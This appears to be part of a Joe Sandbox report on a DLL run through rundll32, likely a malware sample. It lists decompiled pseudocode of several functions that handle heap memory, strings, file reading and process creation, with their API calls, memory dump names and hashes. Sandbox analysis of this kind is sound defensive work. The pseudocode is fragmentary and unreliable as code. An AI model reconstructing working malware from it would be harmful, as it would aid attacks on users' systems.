				_t105 = _a8;
				_t69 =  *((intOrPtr*)(_t105 + 0x20));
				_t90 =  *((intOrPtr*)(_t105 + 0x18));
				 *_t69 = _t90;
				 *((long long*)(_t90 + 8)) = _t69;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0xffffffff");
				if (_t52 == 0) goto 0x80009331;
				if (_a8 == 0) goto 0x80009331;
				E00000001180002770(_t54, _a8);
				return _t52;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000926A
EnterCriticalSection.KERNEL32 ref: 0000000180009274
LeaveCriticalSection.KERNEL32 ref: 00000001800092B4
GetLastError.KERNEL32 ref: 00000001800092E9
EnterCriticalSection.KERNEL32 ref: 00000001800092F5
LeaveCriticalSection.KERNEL32 ref: 0000000180009313

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
String ID:
API String ID: 3478816279-0
Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005A0C Relevance: 9.1, APIs: 6, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharErrorHeapLastMultiWide$AllocFree
String ID:
API String ID: 2267670476-0
Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009B7C Relevance: 9.1, APIs: 6, Instructions: 60
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v40;
				long long _v56;
				void* _t32;
				intOrPtr _t33;
				void* _t55;
				WCHAR* _t63;
				WCHAR* _t66;
				CHAR* _t69;

				_t32 = _t55;
				 *((long long*)(_t32 + 8)) = __rbx;
				 *((long long*)(_t32 + 0x10)) = __rbp;
				 *((long long*)(_t32 + 0x18)) = __rsi;
				 *((long long*)(_t32 + 0x20)) = __rdi;
				_t33 =  *0x8000d4a0;
				lstrlenA(_t69);
				lstrlenW(_t66);
				lstrlenW(_t63);
				r8d = __rbx + _t33 + 0x12;
				HeapAlloc(??, ??, ??);
				if (_t33 == 0) goto 0x80009c2e;
				_v56 = __r8;
				__imp__wnsprintfW();
				r9d = 0;
				r8d = 0;
				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
				HeapFree(??, ??, ??);
				goto 0x80009c32;
				return _v40;
			}

APIs

lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
wnsprintfW.SHLWAPI ref: 0000000180009C05

Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
Part of subcall function 0000000180006754: CreateProcessW.KERNELBASE ref: 00000001800067F7
Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877

HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
String ID:
API String ID: 3150570956-0
Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DD0 Relevance: 8.8, APIs: 7, Instructions: 80
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
				void* _t13;
				intOrPtr* _t39;
				intOrPtr _t41;
				CHAR* _t54;
				long long _t60;
				long long _t61;
				void* _t63;
				long _t69;
				long _t73;
				long long _t74;
				void* _t76;
				CHAR* _t79;

				 *((long long*)(_t63 + 8)) = __rbx;
				 *((long long*)(_t63 + 0x10)) = _t60;
				 *((long long*)(_t63 + 0x18)) = __rsi;
				_t39 =  *0x8000d4a0;
				_t41 =  *((intOrPtr*)(_t39 + 8));
				_t13 = lstrlenA(_t79) + 1;
				r8d = _t13;
				HeapAlloc(_t76, _t73, _t69);
				_t74 = _t39;
				if (_t39 == __rsi) goto 0x80004eb7;
				HeapAlloc(??, ??, ??);
				_t61 = _t39;
				if (_t39 == __rsi) goto 0x80004ea9;
				E00000001180004994(_t39, _t41, __rcx);
				if (_t39 == __rsi) goto 0x80004e62;
				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
				_t6 = _t39 + 2; // 0x2
				E00000001180004994(_t39, _t41, _t6);
				if (_t39 == __rsi) goto 0x80004e8e;
				r8d = _t13 - r12d;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t41 + _t74)) = sil;
				lstrcpyA(_t54);
				goto 0x80004e9c;
				lstrcpyA(??, ??);
				 *_t61 = 0x2f;
				 *((intOrPtr*)(_t61 + 1)) = sil;
				 *__rdx = _t74;
				 *__r8 = _t61;
				goto 0x80004eb7;
				HeapFree(??, ??, ??);
				return 1;
			}

APIs

lstrlenA.KERNEL32 ref: 0000000180004E02
HeapAlloc.KERNEL32 ref: 0000000180004E14
HeapAlloc.KERNEL32 ref: 0000000180004E2E
HeapFree.KERNEL32 ref: 0000000180004EB1

Part of subcall function 0000000180004994: strchr.NTDLL ref: 00000001800049B6

memcpy.NTDLL ref: 0000000180004E77
lstrcpyA.KERNEL32 ref: 0000000180004E86
lstrcpyA.KERNEL32 ref: 0000000180004E8E

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
String ID:
API String ID: 2951650171-0
Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099F4 Relevance: 7.6, APIs: 6, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
				void* _v48;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				void* __rdi;
				void* _t73;
				long long _t75;
				void* _t91;
				intOrPtr _t106;
				intOrPtr* _t115;

				_t92 = __rsi;
				_a24 = __rbx;
				_a16 = __rdx;
				_t106 =  *((intOrPtr*)(__rcx + 0x40));
				_t75 = __rdx;
				r10d =  *(_t106 + 2) & 0x0000ffff;
				_t115 = __r8;
				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
				_t73 = __r10 + _t106 + 8;
				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
				goto 0x80009a53;
				if (_t73 == 0) goto 0x80009b5c;
				_t9 =  &_a8; // 0x52
				_t10 =  &_v56; // 0x12
				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
				_t11 = _t73 + 2; // 0x2
				if (_a8 - _t11 <= 0) goto 0x80009aa8;
				_t15 =  &_v64; // 0xa
				_t16 =  &_v48; // 0x1a
				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
				goto 0x80009aad;
				if (0x57 != 0) goto 0x80009b36;
				r13d = _v64;
				_t19 =  &_v72; // 0x2
				_t20 =  &_v64; // 0xa
				_v80 = r13d;
				_v72 =  *_t115;
				_v88 = _v48;
				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
				memcpy(??, ??, ??);
				 *_t115 = _v72;
				HeapFree(??, ??, ??);
				goto 0x80009b1b;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				r8d = _a8;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009b61;
				return 2;
			}

APIs

memcpy.NTDLL(?,0000000180005069), ref: 0000000180009AFC
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B0E
memset.NTDLL(?,0000000180005069), ref: 0000000180009B23
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B30
memset.NTDLL(?,0000000180005069), ref: 0000000180009B45
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B54

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: FreeHeap$memset$memcpy
String ID:
API String ID: 4172471534-0
Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008034 Relevance: 7.6, APIs: 6, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
				void* _t44;
				void* _t52;
				long long _t53;
				signed long long _t54;
				intOrPtr _t67;
				long _t68;
				long long _t70;
				void* _t77;
				intOrPtr* _t83;
				long _t87;
				void* _t88;
				void* _t90;
				struct _CRITICAL_SECTION* _t92;
				struct _CRITICAL_SECTION* _t96;

				_t52 = _t77;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = __rbp;
				 *((long long*)(_t52 + 0x20)) = __rsi;
				 *((long long*)(_t52 + 0x18)) = __r8;
				_t53 =  *0x8000d4a0;
				_t88 = __rcx;
				EnterCriticalSection(_t96);
				LeaveCriticalSection(_t92);
				HeapAlloc(_t90, _t87, _t68);
				_t70 = _t53;
				if (_t53 == __edx) goto 0x80008129;
				memset(??, ??, ??);
				EnterCriticalSection(??);
				r11d =  *((intOrPtr*)(__rcx + 0xa8));
				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
				if (_t44 == 0) goto 0x80008111;
				_t54 = __edx + __edx * 4;
				_t14 = _t88 + 0x98; // 0x98
				_t16 = _t54 * 8; // 0xc
				_t83 = _t70 + _t16 + 0xc;
				_t67 =  *_t14;
				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
				LeaveCriticalSection(??);
				 *__r9 = __ebp + 1;
				 *_a24 = _t70;
				goto 0x8000812e;
				return 8;
			}

APIs

EnterCriticalSection.KERNEL32 ref: 000000018000806F
LeaveCriticalSection.KERNEL32 ref: 0000000180008082
HeapAlloc.KERNEL32 ref: 000000018000809A
memset.NTDLL ref: 00000001800080B2
EnterCriticalSection.KERNEL32 ref: 00000001800080BC
LeaveCriticalSection.KERNEL32 ref: 0000000180008116

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocHeapmemset
String ID:
API String ID: 3215818008-0
Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003698 Relevance: 7.6, APIs: 5, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
				void* _v32;
				short _v38;
				short _v40;
				long long _v48;
				signed short _v54;
				signed short _v56;
				void* __rsi;
				void* _t20;
				void* _t24;
				short _t30;
				signed short _t32;
				long long _t44;
				long _t56;
				long _t59;
				void* _t60;
				long long _t63;
				void* _t65;
				void* _t75;
				void* _t76;

				_t45 = __rbx;
				_t75 = _t65;
				 *((long long*)(_t75 + 8)) = __rbx;
				 *((long long*)(_t75 + 0x10)) = __rbp;
				_t44 =  *0x8000d4a0;
				_t60 = __r8;
				_t63 = __rdx;
				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
				r12d = 0;
				if (_t20 != r12d) goto 0x8000376a;
				_t30 = _a32;
				_v38 = _t30;
				_v40 = _t30;
				_t32 = _t30 + 1 + _t30 + 1;
				_v54 = _t32;
				r8d = _t32 & 0x0000ffff;
				HeapAlloc(_t76, _t56, _t59);
				_v48 = _t44;
				if (_t44 == _t76) goto 0x8000375a;
				r8d = 0;
				_v56 = r12w;
				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
				RtlNtStatusToDosError(??);
				goto 0x80003748;
				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t24;
			}

APIs

Part of subcall function 0000000180001000: CreateFileW.KERNELBASE ref: 000000018000104A
Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0

HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
RtlNtStatusToDosError.NTDLL ref: 0000000180003729
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
String ID:
API String ID: 45859668-0
Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800033B4 Relevance: 6.4, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
				void* __rdi;
				intOrPtr _t65;
				intOrPtr _t87;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t105;
				signed long long _t107;
				void* _t112;
				void* _t120;
				signed long long _t123;
				signed long long _t130;
				intOrPtr* _t131;
				intOrPtr _t139;
				void* _t154;
				intOrPtr _t155;
				void* _t157;
				signed long long _t159;
				intOrPtr* _t160;
				void* _t163;
				void* _t165;
				void* _t166;
				intOrPtr* _t171;
				void* _t179;
				signed long long _t181;
				signed long long _t182;
				int _t185;
				int _t187;
				void* _t191;

				 *((long long*)(_t165 + 0x18)) = __rbx;
				 *((long long*)(_t165 + 0x10)) = __rdx;
				 *((long long*)(_t165 + 8)) = __rcx;
				_t166 = _t165 - 0x660;
				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
				r13d = r9d;
				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
				r9d = r9d - 1;
				_t123 = r9d - 1;
				if (__eflags < 0) goto 0x80003400;
				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
				_t105 = __r9 + 1;
				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
				if (_t105 == 0) goto 0x80003641;
				_t13 = _t123 + 0x20; // 0x20
				r14d = _t13;
				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
				_t112 = 0 - r14d;
				if (_t112 >= 0) goto 0x8000342d;
				if (_t112 != 0) goto 0x80003422;
				r14d = r14d - 1;
				r8d = _t105;
				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
				memset(_t191, _t187, _t185);
				_t16 = _t166 + 0x250; // 0x249
				r9d = r13d;
				r8d = r14d;
				_t130 = _t185 << 2;
				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
				_t17 = _t166 + 0x40; // 0x39
				r9d = _t105;
				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
				memset(_t163, ??);
				r13d = r13d - _t105;
				_t139 = _t105;
				_t181 = r13d;
				 *(_t166 + 0x30) = _t181;
				if (_t112 < 0) goto 0x800035ee;
				_t124 = _t181 + _t139;
				_t28 = _t181 * 4; // 0x249
				_t160 = _t166 + _t28 + 0x250;
				r9d = 0xffffffff;
				_t31 = _t124 * 4; // 0x249
				_t131 = _t166 + _t31 + 0x250;
				if (_t100 != r9d) goto 0x800034d0;
				_t101 =  *_t131;
				goto 0x800034fb;
				r8d = _t155 + 1;
				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
				_t44 = _t166 + 0x40; // 0x39
				_t171 = _t160;
				r10d = _t105;
				if (_t101 == 0) goto 0x8000357a;
				r12d = 0xffffffff;
				r9d =  *_t44;
				_t87 =  *_t160;
				r10d = r10d + r12d;
				_t176 = __r9 * _t163;
				 *_t171 = _t87;
				if (_t87 - r12d <= 0) goto 0x80003548;
				goto 0x8000354a;
				 *_t171 =  *_t171 - r9d;
				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
				goto 0x80003567;
				if (r10d != 0) goto 0x80003517;
				_t107 =  *((intOrPtr*)(_t166 + 0x28));
				_t182 =  *(_t166 + 0x30);
				 *_t131 =  *_t131 - 0 + 0 + r11d;
				if ( *_t131 != 0) goto 0x80003595;
				_t47 = _t166 + 0x40; // 0x39
				r8d = _t107;
				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
				if (_t120 < 0) goto 0x800035ae;
				_t48 = _t166 + 0x40; // 0x39
				r9d = _t107;
				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
				goto 0x8000357c;
				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
				r13d = r13d - 1;
				 *(_t166 + 0x30) = _t182 - 1;
				r9d = 0xffffffff;
				if (_t120 >= 0) goto 0x800034c7;
				r14d =  *((intOrPtr*)(_t166 + 0x20));
				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
				memset(??, ??, ??);
				_t57 = _t166 + 0x250; // 0x249
				r9d = _t107;
				r8d = r14d;
				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
				r8d = 0x40c;
				memset(??, ??, ??);
				r8d = 0x204;
				return memset(??, ??, ??);
			}

APIs

memset.NTDLL ref: 0000000180003446
memset.NTDLL ref: 0000000180003494
memset.NTDLL ref: 00000001800035FF
memset.NTDLL ref: 000000018000362A
memset.NTDLL ref: 000000018000363C

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007760 Relevance: 6.4, APIs: 5, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 000000018000783B
HeapFree.KERNEL32 ref: 000000018000787A
memcmp.NTDLL ref: 00000001800078A0
memcmp.NTDLL ref: 00000001800078C6
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180006A05), ref: 0000000180007930

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: memcmp$FreeHeap
String ID:
API String ID: 1680564963-0
Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001EEC Relevance: 6.4, APIs: 5, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
				void* __rsi;
				signed int _t65;
				unsigned int _t66;
				signed int _t73;
				void* _t78;
				unsigned int _t85;
				void* _t87;
				void* _t91;
				void* _t112;
				int _t116;
				long long _t122;
				void* _t125;
				void* _t126;
				int _t143;
				void* _t145;
				void* _t148;

				_t78 = __eflags;
				_t87 = _t125;
				 *((long long*)(_t87 + 0x10)) = __rbx;
